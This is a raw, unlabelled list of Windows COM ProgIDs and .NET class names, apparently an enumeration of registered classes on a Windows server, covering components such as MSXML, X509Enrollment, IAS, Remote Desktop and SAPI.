WMISnapinAbout.1 polmkr.apmGpeInternet.1 System.IndexOutOfRangeException TxCTx.TransactionContextEx MSITFS1.0 System.Security.Cryptography.ToBase64Transform MsRDP.MsRDP.8 System.EnterpriseServices.Internal.SoapUtility SAPI.SpMemoryStream.1 SSR.SsrLog.1 ICOFilter.CoICOFilter.1 AccServerDocMgr.AccServerDocMgr.1 ImeBrokerClient1028.1 System.AppDomainUnloadedException Windows.Contact.1 DXImageTransform.Microsoft.Gradient.1 System.Security.Policy.Evidence IMESingleKanjiDict.15 System.Security.Cryptography.RC2CryptoServiceProvider System.Runtime.InteropServices.ComRegisterFunctionAttribute statemodel.StateController.1 DXImageTransform.Microsoft.Strips.1 GPOAdminCustom.TemplateCollectionCtrl.1 System.ArithmeticException Behavior.Microsoft.DXTFilterBehavior.1 Shell.UIHelper.1 Microsoft.Update.WebProxy.1 JobObjLimitInfoProv.JobObjLimitInfoProv.1 OlePrn.OleCvt.1 AccDictionary.AccDictionary.1 WinNTSystemInfo DFSRHelper.HealthReport.1 System.FlagsAttribute System.Security.Cryptography.DSACryptoServiceProvider System.ArrayTypeMismatchException QAgent.CNapElevated System.ApplicationException System.Runtime.Remoting.Metadata.W3cXsd2001.SoapNonNegativeInteger CertificateAuthority.PolicyManage.1 System.Collections.ArrayList System.Globalization.GregorianCalendar ActiveSockets.ActiveSocketsHandler.1 Propshts.apmSheetDialUp.1 WcsPlugInService.WcsPlugInService.1 Propshts.apmPageStartClassicVista.1 SSR.SsrActionData.1 ImgUtil.CoSniffStream.1 Microsoft.JScript.COMPropertyInfo Propshts.apmPageGroups.1 FSLoaderParser2.DefinitionParser.1 MsRdpWebAccess.MsRdpClientShell.1 MsRDP.MsRDP.3.a MSIME.Japan.15 MsTscAx.MsTscAx.5 IAS.MachineInventory.1 IAS.AuditChannel.1 IAS.NTEventLog.1 IAS.InfoBase.1 IAS.Request.1 IAS.DatabaseAccounting.1 IAS.Accounting.1 IAS.IasHelper.1 IAS.ADsDataStore.1 IAS.NetDataStore.1 IAS.URHandler.1 IAS.CClient.1 IAS.ExternalAuthNames.1 IAS.MachineNameMapper.1 IAS.MachineAccountValidation.1 IAS.EAPIdentity.1 IAS.EAPTerminator.1 IAS.MachineNTGroups.1 IAS.UserNTGroups.1 IAS.SHV.1 IAS.QuarantineEvaluator.1 IAS.PostQuarantineEvaluator.1 IAS.CRPBasedEAP.1 IAS.RadiusProtocol.1 IAS.NTSamAuthentication.1 IAS.MSChapErrorReporter.1 IAS.BaseCampHost.1 IAS.AuthorizationHost.1 IAS.RAPBasedEAP.1 IAS.ChangePassword.1 IAS.NTSamPerUser.1 IAS.NTSamNames.1 IAS.UserAccountValidation.1 IAS.RadiusProxy.1 IAS.Match.1 IAS.NTGroups.1 IAS.TimeOfDay.1 IAS.PolicyEnforcer.1 IAS.ProxyPolicyEnforcer.1 IAS.Realm.1 IAS.EAPTypes.1 IAS.AbsoluteTime.1 IMEAPI.CImeRequestSenderJK.15 System.EnterpriseServices.CompensatingResourceManager.ClerkMonitor Propshts.apmPageNetwork.1 Propshts.apmSheetGroups.1 CertificateAuthority.EncodeBitString.1 CertificateAuthority.ExitManage.1 certocm.MscepUpgrade.1 MTSAdmin.Catalog.1 common_dll.apmSecurityExtension.1 System.Security.Cryptography.RSAPKCS1SignatureDeformatter System.Runtime.Serialization.OnSerializedAttribute IMEAPI.CImeKeyMapViewJK.15 SAPI.SpStreamFormatConverter.1 DiskManagement.UITasks System.Globalization.DateTimeFormatInfo SAPI.SpStream.1 Windows.ContactManager.1 MTxAS.AppServer.1 GPOAdmin.ScopeObject.1 Propshts.apmPageFolderOpenWith.1 System.Resources.MissingManifestResourceException Propshts.apmSheetPerformance.1 WScript.Shell.1 Microsoft.Update.StringColl.1 PropertyEntry DXImageTransform.Microsoft.Blur.1 MsRDP.MsRDP.6 SAPI.SpInProcRecoContext.1 WordPad.Document.1 registryBrowser.atlRegistryBrowser.1 System.Runtime.InteropServices.MarshalDirectiveException CryptPKO.CryptPKO.1 CryptSig.CryptSig.1 IMEFILES.CImeFileNameRedirectionManager.15 System.ArgumentOutOfRangeException System.UnauthorizedAccessException EventSystem.EventSubscription WbemScripting.SWbemSink.1 MsRDP.MsRDP.3 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapYear DXImageTransform.Microsoft.CrStretch.1 HomePage.HomePage.1 System.Globalization.TaiwanCalendar WbemScripting.SWbemLocator.1 DXImageTransform.Microsoft.Inset.1 SAPI.SpPhraseBuilder.1 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapToken System.Runtime.InteropServices.RuntimeEnvironment Propshts.apmSheetFolderOptionsVista.1 UPnP.DeviceHostICSSupport.1 Microsoft.DiskQuota.1 TxCTx.TransactionContext polmkr.apmGpeGroups.1 Mmcshext.ExtractIcon.1 System.Security.SuppressUnmanagedCodeSecurityAttribute System.Security.Cryptography.PKCS1MaskGenerationMethod System.Runtime.Remoting.Metadata.W3cXsd2001.SoapPositiveInteger System.Reflection.InvalidFilterCriteriaException PropertyValue System.Security.Cryptography.RSAPKCS1SignatureFormatter ImePlugInDictDictionaryList2052.15 MSPersist.1 GPOAdmin.SnapinAbout.1 MsTscAx.MsTscAx.2 WSMan.InternalAutomation.1 System.Security.UnverifiableCodeAttribute System.NotFiniteNumberException Scripting.Signer DNWithBinary NODEMGR.ScopeTreeObject.1 System.InvalidCastException System.NullReferenceException System.Security.Cryptography.CryptographicException System.Collections.Queue JobObjectProv.JobObjectProv.1 System.Security.Cryptography.SHA384Managed System.Threading.Overlapped Propshts.apmSheetPowerOptionsVista.1 Trustmon.TrustPrv.1 InfoPath.Document.1 GPOAdminCustom.PlanningCollectionCtrl.1 MessageView.MessageView.1 DXImageTransform.Microsoft.CrSlide.1 BehaviorFactory.Microsoft.DXTFilterFactory.1 System.Object Wireless.Extension.1 X509Enrollment.CX509CertificateTemplateADWritable.1 Propshts.apmSheetService.1 System.Runtime.CompilerServices.DiscardableAttribute GPOAdminCustom.TroubleCollectionCtrl.1 System.Security.HostSecurityManager System.Runtime.Remoting.Metadata.W3cXsd2001.SoapLanguage JSFile.HostEncode VBSFile.HostEncode Propshts.apmPagePowerSecurity.1 MstsMhst.MstscMhst.1 SeVA.SeVARemote.1 Propshts.apmPageFileopTypes.1 IMEPad.IMJPCLST.15 Microsoft.DirectSoundWavesReverbDMO.1 System.IO.DirectoryNotFoundException FSLoaderParser.DefinitionLoader.1 X509Enrollment.CObjectId.1 X509Enrollment.CObjectIds.1 X509Enrollment.CBinaryConverter.1 X509Enrollment.CX500DistinguishedName.1 X509Enrollment.CCspInformation.1 X509Enrollment.CCspInformations.1 X509Enrollment.CCspStatus.1 X509Enrollment.CX509PublicKey.1 X509Enrollment.CX509PrivateKey.1 X509Enrollment.CX509Extension.1 X509Enrollment.CX509Extensions.1 X509Enrollment.CX509ExtensionKeyUsage.1 X509Enrollment.CX509ExtensionEnhancedKeyUsage.1 X509Enrollment.CX509ExtensionTemplateName.1 X509Enrollment.CX509ExtensionTemplate.1 X509Enrollment.CAlternativeName.1 X509Enrollment.CAlternativeNames.1 X509Enrollment.CX509ExtensionAlternativeNames.1 X509Enrollment.CX509ExtensionBasicConstraints.1 X509Enrollment.CX509ExtensionSubjectKeyIdentifier.1 X509Enrollment.CX509ExtensionAuthorityKeyIdentifier.1 X509Enrollment.CSmimeCapability.1 X509Enrollment.CSmimeCapabilities.1 X509Enrollment.CX509ExtensionSmimeCapabilities.1 X509Enrollment.CPolicyQualifier.1 X509Enrollment.CPolicyQualifiers.1 X509Enrollment.CCertificatePolicy.1 X509Enrollment.CCertificatePolicies.1 X509Enrollment.CX509ExtensionCertificatePolicies.1 X509Enrollment.CX509ExtensionMSApplicationPolicies.1 X509Enrollment.CX509Attribute.1 X509Enrollment.CX509Attributes.1 X509Enrollment.CX509AttributeExtensions.1 X509Enrollment.CX509AttributeClientId.1 X509Enrollment.CX509AttributeRenewalCertificate.1 X509Enrollment.CX509AttributeArchiveKey.1 X509Enrollment.CX509AttributeArchiveKeyHash.1 X509Enrollment.CX509AttributeOSVersion.1 X509Enrollment.CX509AttributeCspProvider.1 X509Enrollment.CCryptAttribute.1 X509Enrollment.CCryptAttributes.1 X509Enrollment.CCertProperty.1 X509Enrollment.CCertProperties.1 X509Enrollment.CCertPropertyFriendlyName.1 X509Enrollment.CCertPropertyDescription.1 X509Enrollment.CCertPropertyAutoEnroll.1 X509Enrollment.CCertPropertyRequestOriginator.1 X509Enrollment.CCertPropertySHA1Hash.1 X509Enrollment.CCertPropertyKeyProvInfo.1 X509Enrollment.CCertPropertyArchived.1 X509Enrollment.CCertPropertyBackedUp.1 X509Enrollment.CCertPropertyEnrollment.1 X509Enrollment.CCertPropertyRenewal.1 X509Enrollment.CCertPropertyArchivedKeyHash.1 X509Enrollment.CSignerCertificate.1 X509Enrollment.CX509NameValuePair.1 X509Enrollment.CX509CertificateRequestPkcs10.1 X509Enrollment.CX509CertificateRequestCertificate.1 X509Enrollment.CX509CertificateRequestPkcs7.1 X509Enrollment.CX509CertificateRequestCmc.1 X509Enrollment.CX509Enrollment.1 X509Enrollment.CX509EnrollmentWebClassFactory.1 X509Enrollment.CCertPropertyEnrollmentPolicyServer.1 X509Enrollment.CX509EnrollmentHelper.1 X509Enrollment.CX509MachineEnrollmentFactory.1 X509Enrollment.CX509CertificateRevocationListEntry.1 X509Enrollment.CX509CertificateRevocationListEntries.1 X509Enrollment.CX509CertificateRevocationList.1 X509Enrollment.CX509SCEPEnrollment.1 Shell.Explorer.2 ImeCommonAPI1041.15 System.Runtime.Serialization.SurrogateSelector Msxml2.DOMDocument.6.0 Msxml2.FreeThreadedDOMDocument.6.0 Msxml2.XMLSchemaCache.6.0 Msxml2.XSLTemplate.6.0 Msxml2.XMLHTTP.6.0 Msxml2.ServerXMLHTTP.6.0 Msxml2.SAXXMLReader.6.0 Msxml2.SAXAttributes.6.0 Msxml2.MXXMLWriter.6.0 Msxml2.MXHTMLWriter.6.0 Msxml2.MXNamespaceManager.6.0 FDE.1 System.EnterpriseServices.RegistrationHelper System.SerializableAttribute System.Security.Policy.PolicyException IMAPI.MSEnumDiscRecordersObj.1 IEPH.RSSHandler System.Runtime.InteropServices.ComConversionLossAttribute Workspace.Installer.1 SppComApi.OfflineActivation.1 Propshts.apmPageTaskSettings.1 WinNT Propshts.apmPageRegionalNumbers.1 MsTscAx.MsTscAx.10 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapHexBinary Propshts.apmPageTaskbar.1 IAS.ExtensionHost.1 System.Text.UTF8Encoding browser_dll.ctlDSNDriverBrowser.2 ReplicateCatalog.ReplicateCatalog.1 browser_dll.ctlDSNBrowser.2 System.MissingFieldException Propshts.apmPageSecuritySettings.1 SAPI.SpCustomStream.1 browser_dll.ctlPortPrinterSettings.1 RegisterControl.Register.1 DiskManagement.SnapInExtension Propshts.apmSheetDesktop.1 Kbproc.SCWRegistrar.1 System.Runtime.InteropServices.ComUnregisterFunctionAttribute System.Security.Cryptography.DSASignatureFormatter ITIR.EngStemmer.4 SplSetup.CFindNetPrinters.1 System.Runtime.Remoting.Lifetime.LifetimeServices GPMGMT.Forest.1 Propshts.apmPageVpnSecurity.1 MsRDP.MsRDP.2 SAPI.SpCompressedLexicon.1 MSIME.Japan.SuggestionFramework.15 CLRMetaData.CLRRuntimeHost.1 CLRMetaData.CLRRuntimeHost.2 System.InvalidProgramException System.Threading.ReaderWriterLock SAPI.SpPhoneConverter.1 FunctionDiscovery.UMBusDriver.1 SppComApi.ElevationConfig.1 X509Enrollment.CX509EnrollmentPolicyActiveDirectory.1 X509Enrollment.CX509EnrollmentPolicyWebService.1 X509Enrollment.CX509PolicyServerListManager.1 X509Enrollment.CX509PolicyServerUrl.1 System.Diagnostics.Debugger Propshts.apmPageSecurityCommon.1 SearchIntegrationExe.CImeSearchIntegration.15 OlePrn.PrinterURL.1 RowsetHelper System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter LargeInteger ComplianceExtensions.SceComplianceExt.1 STClient.STClient.1 System.MethodAccessException COMSNAP.CPartitionSetPropPages.1 DXImageTransform.Microsoft.CrInset.1 System.Reflection.ObfuscationAttribute System.Diagnostics.DebuggerStepThroughAttribute Microsoft.WINDOWS.SQLLITE.Errors.4.0 SAPI.SpFileStream.1 polmkr.apmGpeNetwork.1 Propshts.apmSheetViewOptions.1 MSExtGroup Propshts.apmSheetRegional.1 DFSRHelper.PropagationReport.1 System.InvalidOperationException ImeKeyEventHandler1042.15 certocm.CertSrvSetup.1 System.FormatException System.ContextStaticAttribute SAPI.SpResourceManager.1 SAPI.SpVoice.1 System.Runtime.InteropServices.InAttribute GPOAdminCustom.ForestCollectionCtrl.1 MsRDP.MsRDP.2.a polmkr.apmSnapinAbout.1 Krnlprov.KernelTraceProvider.1 XML Propshts.apmPageRegProp.1 Application.Manifest CertificateAuthority.Request.1 Propshts.apmSheetNetwork.1 certocm.CertificateEnrollmentServerSetup.1 Propshts.apmSheetImdTaskVista.1 IImeIPointSrv1041.15 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapEntities DXImageTransform.Microsoft.Compositor.1 DXImageTransform.Microsoft.Blinds.1 System.Runtime.InteropServices.InvalidOleVariantTypeException certocm.PolicyEnrollUpgrade.1 polmkr.apmGpePower.1 WbemScripting.SWbemNamedValueSet.1 Rdpcomapi.RDPSession.1 System.Runtime.Remoting.Metadata.SoapAttribute Shell.FolderView.1 Propshts.apmPageShortcut.1 System.Runtime.Serialization.OnSerializingAttribute System.StackOverflowException System.Runtime.Remoting.Metadata.SoapTypeAttribute RoamingSecurity.RoamingSecurity.1 MSITFS1.0 MSITFS1.0 System.Runtime.InteropServices.SetWin32ContextInIDispatchAttribute HNetCfg.FwProduct System.MulticastNotSupportedException Previous.Versions System.Text.ASCIIEncoding System.EnterpriseServices.RegistrationHelperTx SCW.FeedbackObj.1 System.Security.Cryptography.CryptoConfig SAPI.SpAudioFormat.1 MSExtPrintQueue IMEAPI.CImeCommandAvailabilityViewJK.15 DXImageTransform.Microsoft.Glow.1 COMSNAP.CPartitionNotify.1 Propshts.apmSheetDrive.1 System.Security.Cryptography.RSAOAEPKeyExchangeFormatter System.Text.UnicodeEncoding Scwfirewallext.FirewallLogic.1 CertificateAuthority.View.1 System.IO.IOException SDSnapinAbout.1 DXImageTransform.Microsoft.ICMFilter.1 System.Exception browser_dll.ctlMsiPatchBrowser.2 smef.SMEFRuleLog.1 Wired.Extension.1 GPOAdminCustom.ForestCtrl.1 apmFilter.apmFilter.1 Propshts.apmPageServiceRecovery.1 UPnP.UPnPDevice.1 System.PlatformNotSupportedException System.Runtime.Remoting.Contexts.Context ImeKeyEventHandler1041.15 GPOAdminCustom.TroubleCtrl.1 System.Runtime.CompilerServices.CallConvCdecl MsTscAx.MsTscAx.9 PNGFilter.CoPNGFilter.1 CImeDictAPIWebServiceComment.15 MsTscAx.MsTscAx.1 SppComApi.OnlineActivation.1 VaultRoaming.VaultSettingsHandler.1 Propshts.apmSheetFolderOptions.1 System.Security.Policy.ApplicationTrust Propshts.apmSheetFileTypes.1 ImeBrokerClient2052.1 DxDiag.DxDiagProvider.1 System.Security.Cryptography.SHA512Managed PrintSys.CoPrintIsolationHost.1 Propshts.apmPagePowerScheme.1 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapYearMonth System.Runtime.InteropServices.InvalidComObjectException System.Security.Cryptography.HMACMD5 Object.Microsoft.DXTFilterCollection.1 ImgUtil.CoDitherToRGB8.1 Udtool.UserDicManager.15 polmkr.apmGpePrinters.1 SAPI.SpMMAudioOut.1 System.Runtime.Serialization.Formatters.SoapFault WMINet_Utils.WmiSecurityHelper.1 System.IO.DriveNotFoundException SAPI.SpObjectTokenCategory.1 MsRDP.MsRDP.7 CertificateAuthority.ServerPolicy.1 SppComApi.LicensingStateTools.1 certocm.MSCEPSetup.1 SymBinder System.DataMisalignedException Propshts.apmPageDialUp.1 SAPI.SpMMAudioEnum.1 JobObjSecLimitInfoProv.JobObjSecLimitInfoProv.1 System.EnterpriseServices.CompensatingResourceManager.Compensator COMSNAP.CPartitionContextMenu.1 EventSystem.EventPublisher.1 RequestMakeCall.RequestMakeCall.1 MSIME.Japan.LMDS.15 DXImageTransform.Microsoft.CrSpiral.1 MsTscAx.MsTscAx.4 System.EntryPointNotFoundException System.Security.Permissions.HostProtectionAttribute HHCtrl.FileFinder.1 Internet.HHCtrl.1 Windows.Xbap DXImageTransform.Microsoft.Alpha.1 DXImageTransform.Microsoft.DropShadow.1 DXImageTransform.Microsoft.Wave.1 NODEMGR.AppEventsDHTMLConnector.1 HNetCfg.NATUPnP.1 ScriptBridge.ScriptBridge.1 System.Security.Cryptography.HMACSHA384 DiskManagement.Control TerminalManager.Class DXImageTransform.Microsoft.Wipe.1 UPnP.SOAPRequest.1 System.Security.Cryptography.CspParameters System.IO.FileLoadException IMEAPI.CImePropertyJK.15 System.Security.Policy.TrustManagerContext Msxml2.ServerXMLHTTP.3.0 Msxml2.ServerXMLHTTP System.Runtime.InteropServices.ExternalException certocm.CertificateEnrollmentPolicyServerSetup.1 System.Data.SqlClient.SQLDebugging Propshts.apmSheetFileFolder.1 MMC.IconControl.1 Propshts.apmSheetTasks.1 System.EnterpriseServices.Internal.ComSoapPublishError fRecordingTerminal.FileRecordingTerminal.1 SAPI.SpGrammarCompiler.1 Microsoft.GroupPolicy.AdmTmplEditor.GPMAdmTmplEditorManager SSR.SsrEngine.1 AzRoles.AzAuthorizationStore.1 Propshts.apmPageRegionalCurrency.1 Propshts.apmPageUsers.1 DXImageTransform.Microsoft.CheckerBoard.1 MMC.ExecutivePlatform.1 System.MTAThreadAttribute MSTSWebProxy.MSTSWebProxy.1 RasDialin.UserAdminExt.1 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapNotation VBScript VBScript Author VBScript.Encode Microsoft.Update.Searcher.1 System.Security.Cryptography.DESCryptoServiceProvider NODEMGR.MMCViewExt.1 Microsoft.JScript.Vsa.VsaEngine AccessControlEntry System.Runtime.InteropServices.OptionalAttribute CImeDictAPILexiconBuilder.15 AccessControlList bidispl.bidirequest.1 SecurityDescriptor DXImageTransform.Microsoft.GradientWipe.1 polmkr.apmGpeRegional.1 UPnP.UPnPDevices.1 polmkr.apmCallback.1 FunctionDiscovery.FunctionInstanceCollection.1 CfgComp.CfgComp.1 Microsoft.Update.AgentUpdater.1 PTRegTerminalClass.Class System.Runtime.Remoting.Services.EnterpriseServicesHelper IAS.SdoService.1 System.Runtime.CompilerServices.CallConvStdcall DfsShell.DfsShellAdmin.1 WSMan.Automation.1 SDSnapin.SDSnapin.1 RDS.DataControl.6.0 RDS.DataSpace.6.0 System.FieldAccessException Propshts.apmPageRegionalTime.1 polmkr.apmGpeRegistry.1 Propshts.apmPageFileFolder.1 DocWrap.DocWrap.1 browser_dll.ctlDOMEventReturn.2 polmkr.apmGpeNetworkShares.1 Microsoft.Update.AutoUpdate.1 System.IO.PathTooLongException Microsoft.Update.SystemInfo.1 Propshts.apmSheetOpenWith.1 System.AppDomainManager SQLOLEDB ErrorLookup.1 JobObjIOActgInfoProv.JobObjIOActgInfoProv.1 UPnP.UPnPServices.1 netcenter.NCLUA.1 System.Security.Cryptography.FromBase64Transform SAPI.SpPhraseInfoBuilder.1 Microsoft.Update.AgentInfo.1 WbemScripting.SWbemLastError.1 System.Runtime.Remoting.Messaging.OneWayAttribute OlePrn.OleInstall.1 browser_dll.ctlRegistryBrowser.2 WinInetBroker.WinInetBroker.1 DXImageTransform.Microsoft.CrBarn.1 FDE.1 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapNegativeInteger System.Security.Cryptography.CryptographicUnexpectedOperationException System.Runtime.CompilerServices.NativeCppClassAttribute SysColorCtrl.SysColorCtrl.1 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapNmtoken Sysmon.3 Propshts.apmSheetIniFile.1 ndfapi.NDFAPI.1 Propshts.apmPageStartGeneral.1 UPnP.UPnPService.1 CertificateAuthority.GetConfig.1 FunctionDiscovery.Discovery.1 System.Runtime.Remoting.Metadata.SoapParameterAttribute SAPI.SpWaveFormatEx.1 Microsoft.JScript.COMMethodInfo Propshts.apmPageNetShareInfo.1 System.EnterpriseServices.RegistrationHelperTx MSDASQL.1 MSDASQL ErrorLookup.1 MSDASQLEnumerator.1 MSDAER.1 MSDAENUM.1 MSDADC.1 Snapins.FolderSnapin.1 Snapins.OCXSnapin.1 Snapins.HTMLSnapin.1 COMSNAP.ComponentDataImpl.1 SAPI.SpUncompressedLexicon.1 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapDay System.RankException TSSDClient.SessionArbitrationHelper.1 Microsoft.JScript.COMFieldInfo IMEPad.imjpskey.15 Microsoft.IE.Manager System.Runtime.InteropServices.SEHException System.EnterpriseServices.Internal.SoapServerVRoot polmkr.apmGpeTasks.1 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapMonth CLRMetaData.CorRuntimeHost.2 SPPWMI.SppWmiTokenActivationSigner.1 System.ContextMarshalException HNetCfg.FwProducts System.DuplicateWaitObjectException polmkr.apmGpeServices.1 JScript.Compact System.NonSerializedAttribute MSDASC.PDPO.1 System.OutOfMemoryException CDO.Message.1 CDO.Configuration.1 CDO.DropDirectory.1 CDO.SS_SMTPOnArrivalSink.1 CDO.SS_NNTPOnPostSink.1 CDO.SS_NNTPOnPostFinalSink.1 CDO.SMTPConnector.1 CDO.NNTPPostConnector.1 CDO.NNTPFinalConnector.1 CDO.NNTPEarlyConnector.1 CDO.SS_NNTPOnPostEarlySink.1 CTREEVIEW.CTreeViewCtrl.1 WorkspaceBrokerAx.WorkspaceBrokerAx.1 EventSystem.EventClass System.MissingMemberException System.Runtime.Remoting.Metadata.W3cXsd2001.SoapAnyUri IMAPI2FS.MsftIsoImageManager.1 DFSRHelper.ADProxy.1 polmkr.apmGpeShortcuts.1 Windows.XamlDocument SAPI.SpMMAudioIn.1 common_dll.apmSecurityExtension2.1 polmkr.apmGpeStartMenu.1 System.Runtime.Serialization.Formatters.InternalRM Msxml System.Runtime.Remoting.Metadata.W3cXsd2001.SoapTime Propshts.apmPageService.1 Propshts.apmPageDesktopItems.1 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapNcName Propshts.apmSheetUsers.1 DXImageTransform.Microsoft.Slide.1 DefragEngine.DefragEngine.1 System.Runtime.Serialization.FormatterConverter Microsoft.XMLParser.1.0 System.Security.Cryptography.MD5CryptoServiceProvider WbemScripting.SWbemRefresher.1 Microsoft.Update.Installer.1 MsTscAx.MsTscAx.7 WMINet_Utils.WmiSinkDemultiplexor.1 Search.AppContentFilter.1 Propshts.apmPageStartAdvanced.1 Paint.Picture certadm.OCSPAdmin.1 System.Resources.MissingSatelliteAssemblyException MSIME.Japan.IHDS.15 PrintSys.CoFilterPipeline.1 MSITFS1.0 System.Reflection.CustomAttributeFormatException FunctionDiscovery.WSDPrintProxy.1 RDSProfileHandler.1 System.TypeUnloadedException GPOAdmin.Component.1 NODEMGR.MMCVersionInfo.1 System.Threading.Mutex Propshts.apmSheetDevice.1 Propshts.apmSheetRegistryWizard.1 browser_dll.ctlServiceBrowser.2 COMSNAP.SnapinAboutImpl.1 System.EnterpriseServices.Internal.Publish System.EnterpriseServices.Internal.IISVirtualRoot System.EnterpriseServices.Internal.GenerateMetadata System.Runtime.Remoting.Metadata.W3cXsd2001.SoapQName System.Security.Cryptography.RSACryptoServiceProvider Vss.VSSUI.1 SAPI.SpDataKey.1 System.Reflection.TargetParameterCountException SAPI.SpGramCompBackEnd.1 System.Security.Cryptography.TripleDESCryptoServiceProvider System.NotSupportedException Microsoft.DirectSoundGargleDMO.1 System.Runtime.Remoting.ServerException DiskManagement.SnapInComponent MSExtOrganization Propshts.apmSheetDesktopItem.1 DXImageTransform.Microsoft.MotionBlur.1 Wireless.About.1 System.Runtime.Remoting.Channels.ClientChannelSinkStack System.Runtime.Remoting.Metadata.W3cXsd2001.SoapDuration Propshts.apmSheetRegValue.1 GPOAdminCustom.WMICtrl.1 SQLOLEDB Enumerator.1 MSDAOSP.1 System.Diagnostics.SymbolStore.SymLanguageVendor COMSNAP.ComponentServicesExtensionSnapin.1 Propshts.apmSheetTasksVista.1 Propshts.apmPageDevGen.1 Propshts.apmPageVpnAdvanced.1 ImeCommonAPIClassFactory1041.15 GPOAdmin.ComponentData.1 DiskManagement.SnapIn DiskManagement.DataObject polmkr.apmComponent.1 UPnP.UPnPDeviceFinder.1 PenIMC.PimcManager.4 Propshts.apmSheetTaskbar.1 Kbproc.process.1 ndfapi.NetworkDiagnostics.1 SAPI.SpNotifyTranslator.1 HNetCfg.FwPolicy2 tsuserex.ADsTSUserEx.1 DXImageTransform.Microsoft.RevealTrans.1 browser_dll.ctlDUNBrowser.2 GPOAdminCustom.GPOInaccessibleCtrl.1 System.Security.XmlSyntaxException SQLXMLX.1 RemoteHelper.RemoteHelper MSIME.China.7 Workspace.PolicyProcessor.1 FunctionDiscovery.PropertyStore.1 Propshts.apmPageStartAdvancedVista.1 VSS.VSSCoordinator.1 CLRMetaData.CorMetaDataDispenser.2 DXImageTransform.Microsoft.CrZigzag.1 DXImageTransform.Microsoft.Shadow.1 Propshts.apmPageImdTask.1 System.Text.StringBuilder GPOAdminCustom.DomainCtrl.1 System.Runtime.Serialization.Formatters.SoapMessage System.ExecutionEngineException System.EnterpriseServices.Internal.ClientRemotingConfig Microsoft.WINDOWS.SQLLITE.Param.4.0 System.Runtime.Remoting.Services.TrackingServices Propshts.apmSheetAppearance.1 CompressedFolder System.BadImageFormatException IAS.SdoMachine.1 DispatchMapper.DispatchMapper.1 System.Runtime.CompilerServices.IDispatchConstantAttribute Propshts.apmPageNetDrive.1 System.TimeoutException RemoteDesktopClient.RemoteDesktopClient.1 Shell.Explorer.1 browser_dll.ctlMsiProductBrowser.2 System.Security.VerificationException System.Globalization.ThaiBuddhistCalendar HNetCfg.FwAuthorizedApplication DXImageTransform.Microsoft.Barn.1 COMSVCS.TrackerServer EventPublisher.EventPublisher QC.Recorder QC.ListenerHelper new queue QC.DLQListener System.EnterpriseServices.Internal.ClrObjectFactory Byot.ByotServerEx CrmClerk.CrmClerk.1 CrmRecoveryClerk.CrmRecoveryClerk.1 QC.MessageMover.1 Pdump.ProcessDump partition soap COMSVCS.CServiceConfig.1 System.Security.HostProtectionException DfsShell.DfsShell.1 System.Runtime.CompilerServices.CallConvFastcall SeVA.SeVAResultsCheck.1 Microsoft.XMLHTTP.1.0 GPOAdminCustom.LinkedGPOCtrl.1 FunctionDiscovery.PropertyStoreCollection.1 Scripting.Dictionary IEPH.HistoryHandler System.Security.Policy.GacInstalled System.Globalization.HijriCalendar System.Security.Cryptography.RSAPKCS1KeyExchangeDeformatter COMSNAP.CPartitionSetContextMenu.1 System.Security.SecurityException Microsoft.DirectSoundCompressorDMO.1 Microsoft.DirectSoundDistortionDMO.1 GPOAdmin.ListViewInformation.1 System.EnterpriseServices.Internal.AppDomainHelper Microsoft.DirectSoundEchoDMO.1 SAPI.SpObjectToken.1 DBRSTPRX.AsProxy.1 DBRSTPRX.AsServer.1 DBROWPRX.AsProxy.1 DBROWPRX.AsServer.1 Microsoft.DirectSoundI3DL2ReverbDMO.1 Microsoft.DirectSoundFlangerDMO.1 Microsoft.WINDOWS.SQLLITE.Error.4.0 Propshts.apmPageDesktopAppearance.1 Microsoft.DirectSoundChorusDMO.1 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapEntity ConsolePower.ConsolePower.1 VaultRoaming.SyncTaskHandler.1 DXImageTransform.Microsoft.Stretch.1 RSOPPROV.RsopPlanningModeProvider.1 System.Reflection.AssemblyName CFmIfsEngine.CFmIfsEngine.1 System.Runtime.InteropServices.TypeLibConverter NODEMGR.MMCDocConfig.1 System.Runtime.InteropServices.ComImportAttribute Package ADsSecurityUtility Workspace.ResTypeRegistry.1 Cmiv2.CmiFactory.2 MSIME.Taiwan.15 JScript JScript Author JScript.Encode Propshts.apmPageStartGeneralVista.1 Propshts.apmPageDataSource.1 Msxml2.XMLParser Msxml2.XMLParser.3.0 Msxml2.DOMDocument.3.0 Msxml2.FreeThreadedDOMDocument.3.0 Msxml2.XMLSchemaCache.3.0 Msxml2.XMLHTTP.3.0 Msxml2.XSLTemplate.3.0 Msxml2.DSOControl.3.0 xmlfile components.apmSecurityInformation.1 DXImageTransform.Microsoft.Emboss.1 DXImageTransform.Microsoft.Engrave.1 GPMGMT.GPM.1 Propshts.apmPagePowerAdvanced.1 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapBase64Binary System.IO.MemoryStream COMAdmin.COMAdminCatalog.1 System.DivideByZeroException System.EnterpriseServices.Internal.SoapServerTlb Msxml2.DOMDocument Msxml2.FreeThreadedDOMDocument Msxml2.DSOControl Msxml2.XMLHTTP Propshts.apmSheetStart.1 ScwRegistryExt.Registry.1 NODEMGR.ComCacheCleanup.1 GPOAdmin.CookieCutter.1 DXImageTransform.Microsoft.RandomDissolve.1 SPPUI.SPPUIObjectInteractive.1 System.NotImplementedException Microsoft.Update.ServiceManager.1 components.apmResultObject.1 certadm.OCSPPropertyCollection.1 WScript.Shell.1 WScript.Network.1 RCM.ConnectionManager.1 DXImageTransform.Microsoft.Light.1 System.Runtime.Remoting.Metadata.W3cXsd2001.SoapId COMSNAP.CUserPropPages.1 DiskManagement.SnapInAbout Microsoft.FeedsManager InternetShortcut System.Security.Cryptography.SHA1CryptoServiceProvider Propshts.apmPageFolderView.1 Msxml2.MXXMLWriter AccClientDocMgr.AccClientDocMgr.1 bidispl.bidirequestcontainer.1 CorrEngine.CorrelationEngine.1 ScriptoSys.Scripto.1 System.Runtime.Remoting.Lifetime.ClientSponsor MSExtOrganizationUnit 